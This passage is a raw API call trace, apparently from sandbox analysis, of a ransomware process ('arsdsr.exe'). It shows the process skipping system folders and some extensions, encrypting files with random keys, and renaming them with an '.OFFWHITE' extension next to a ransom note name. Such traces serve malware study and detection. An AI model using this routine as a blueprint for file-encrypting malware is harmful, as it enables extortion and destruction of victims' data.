0x500000 [0151.709] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.709] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.709] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.709] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.709] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.709] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.709] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.709] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.709] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.709] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc90*=0x100) returned 1 [0151.709] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.709] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.709] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0151.709] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.709] SetLastError (dwErrCode=0x0) [0151.709] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.712] GetLastError () returned 0x0 [0151.712] GetLastError () returned 0x0 [0151.712] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.712] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.712] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.712] WriteFile (in: hFile=0x21c, lpBuffer=0x526da8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526da8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0151.712] GetProcessHeap () returned 0x500000 [0151.712] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2fe) returned 0x52ee70 [0151.712] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.712] ReadFile (in: hFile=0x21c, lpBuffer=0x52ee70, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x52ee70*, lpNumberOfBytesRead=0x295dec0*=0x2fe, lpOverlapped=0x0) returned 1 [0151.712] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.712] WriteFile (in: hFile=0x21c, lpBuffer=0x52ee70*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52ee70*, lpNumberOfBytesWritten=0x295decc*=0x2fe, lpOverlapped=0x0) returned 1 [0151.712] GetProcessHeap () returned 0x500000 [0151.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ee70 | out: hHeap=0x500000) returned 1 [0151.713] CloseHandle (hObject=0x21c) returned 1 [0151.713] GetProcessHeap () returned 0x500000 [0151.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.713] GetProcessHeap () returned 0x500000 [0151.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.713] GetProcessHeap () returned 0x500000 [0151.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.713] GetProcessHeap () returned 0x500000 [0151.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.713] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" [0151.713] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.OFFWHITE" [0151.713] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.offwhite")) returned 1 [0151.713] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="..") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="...") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="windows") returned -1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="$recycle.bin") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="rsa") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="ntuser.dat") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="programdata") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="appdata") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="program files") returned 1 [0151.714] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="program files (x86)") returned 1 [0151.714] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" [0151.714] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="VC_redist.x64.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" [0151.714] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.714] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.714] PathFindExtensionW (pszPath="VC_redist.x64.exe") returned=".exe" [0151.714] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0151.714] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0151.714] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.714] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2=".") returned 1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="..") returned 1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="...") returned 1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="windows") returned -1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="$recycle.bin") returned 1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="rsa") returned -1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="ntuser.dat") returned -1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="programdata") returned -1 [0151.714] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="appdata") returned -1 [0151.715] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="program files") returned -1 [0151.715] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="program files (x86)") returned -1 [0151.715] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.715] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0151.715] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" [0151.715] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" [0151.715] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0151.715] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.716] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.716] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.716] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.716] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.716] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad7040, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x105e7220, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0151.716] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0151.716] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" [0151.716] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" [0151.716] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.716] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.716] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0151.716] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0151.717] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0151.717] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0151.717] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0151.717] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0151.717] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0151.717] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0151.717] GetProcessHeap () returned 0x500000 [0151.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526db8 [0151.717] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0151.718] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=666) returned 1 [0151.718] GetProcessHeap () returned 0x500000 [0151.718] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.718] GetProcessHeap () returned 0x500000 [0151.718] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.718] GetProcessHeap () returned 0x500000 [0151.718] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.718] GetProcessHeap () returned 0x500000 [0151.718] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.718] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.718] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.718] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc90*=0x100) returned 1 [0151.719] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.719] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.719] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0151.719] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.720] SetLastError (dwErrCode=0x0) [0151.720] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.721] GetLastError () returned 0x0 [0151.721] GetLastError () returned 0x0 [0151.721] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x39a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.721] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.721] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.721] WriteFile (in: hFile=0x21c, lpBuffer=0x526db8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526db8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0151.721] GetProcessHeap () returned 0x500000 [0151.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x29a) returned 0x53e5b0 [0151.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.722] ReadFile (in: hFile=0x21c, lpBuffer=0x53e5b0, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesRead=0x295dec0*=0x29a, lpOverlapped=0x0) returned 1 [0151.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.722] WriteFile (in: hFile=0x21c, lpBuffer=0x53e5b0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesWritten=0x295decc*=0x29a, lpOverlapped=0x0) returned 1 [0151.722] GetProcessHeap () returned 0x500000 [0151.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53e5b0 | out: hHeap=0x500000) returned 1 [0151.722] CloseHandle (hObject=0x21c) returned 1 [0151.722] GetProcessHeap () returned 0x500000 [0151.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.722] GetProcessHeap () returned 0x500000 [0151.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.722] GetProcessHeap () returned 0x500000 [0151.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.722] GetProcessHeap () returned 0x500000 [0151.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.722] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" [0151.722] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.OFFWHITE" [0151.722] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.offwhite")) returned 1 [0151.723] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="..") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="...") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="windows") returned -1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$recycle.bin") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="rsa") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ntuser.dat") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="programdata") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="appdata") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="program files") returned 1 [0151.723] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="program files (x86)") returned 1 [0151.723] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\" [0151.723] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="vcredist_x86.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned="C:/Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" [0151.723] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.723] lstrcmpiW (lpString1="kernel32.dll", 